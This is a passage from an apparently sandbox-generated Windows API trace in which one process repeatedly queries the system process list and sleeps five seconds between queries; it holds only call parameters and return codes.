BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0227.081] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0227.081] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0227.086] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0227.087] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0227.089] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0227.089] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0227.090] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0227.090] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0227.090] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0227.095] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0227.096] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0227.097] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0227.098] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0227.098] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0227.099] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0227.099] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0227.103] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0227.104] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0227.106] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0227.106] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0227.107] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0227.107] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0227.107] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0227.111] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0227.112] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0227.114] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0227.114] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0227.115] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0227.116] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0227.116] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0227.122] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0227.123] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0227.124] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0227.125] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0227.126] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0227.126] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0227.126] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0227.131] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0227.132] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0227.134] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0227.134] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0227.135] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0227.135] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0227.136] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0227.140] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0227.141] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0227.143] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0227.143] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0227.144] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0227.144] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0227.145] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0227.149] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0227.150] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0227.152] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0227.152] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0227.153] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0227.153] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0227.154] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0227.158] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0227.159] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0227.161] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0227.162] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0227.163] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0227.163] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0227.163] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0227.168] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0227.169] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0227.171] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0227.171] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0227.172] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0227.173] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0227.173] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0227.177] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0227.178] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0227.179] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0227.180] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0227.180] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0227.181] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0227.181] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0227.185] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0227.187] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0227.189] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0227.189] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0227.190] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0227.190] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0227.190] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0227.194] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0227.195] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0227.197] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0227.197] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0227.198] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0227.198] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0227.199] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0227.203] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0227.204] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0227.205] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0227.205] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0227.206] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0227.207] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0227.207] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0227.212] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0227.212] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0227.214] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0227.214] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0227.215] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0227.216] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0227.216] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0227.222] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0227.222] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0227.224] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0227.224] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0227.225] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0227.225] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0227.226] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0227.230] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0227.231] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0227.233] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0227.233] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0227.234] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0227.234] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0227.234] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0227.237] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0227.238] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0227.239] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0227.240] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0227.241] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0227.241] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0227.241] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0227.245] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0227.245] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0227.247] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0227.247] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0227.248] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0227.248] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0227.248] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0227.253] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0227.254] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0227.256] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0227.256] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0227.257] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0227.257] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0227.258] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0227.263] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0227.264] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0227.266] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, 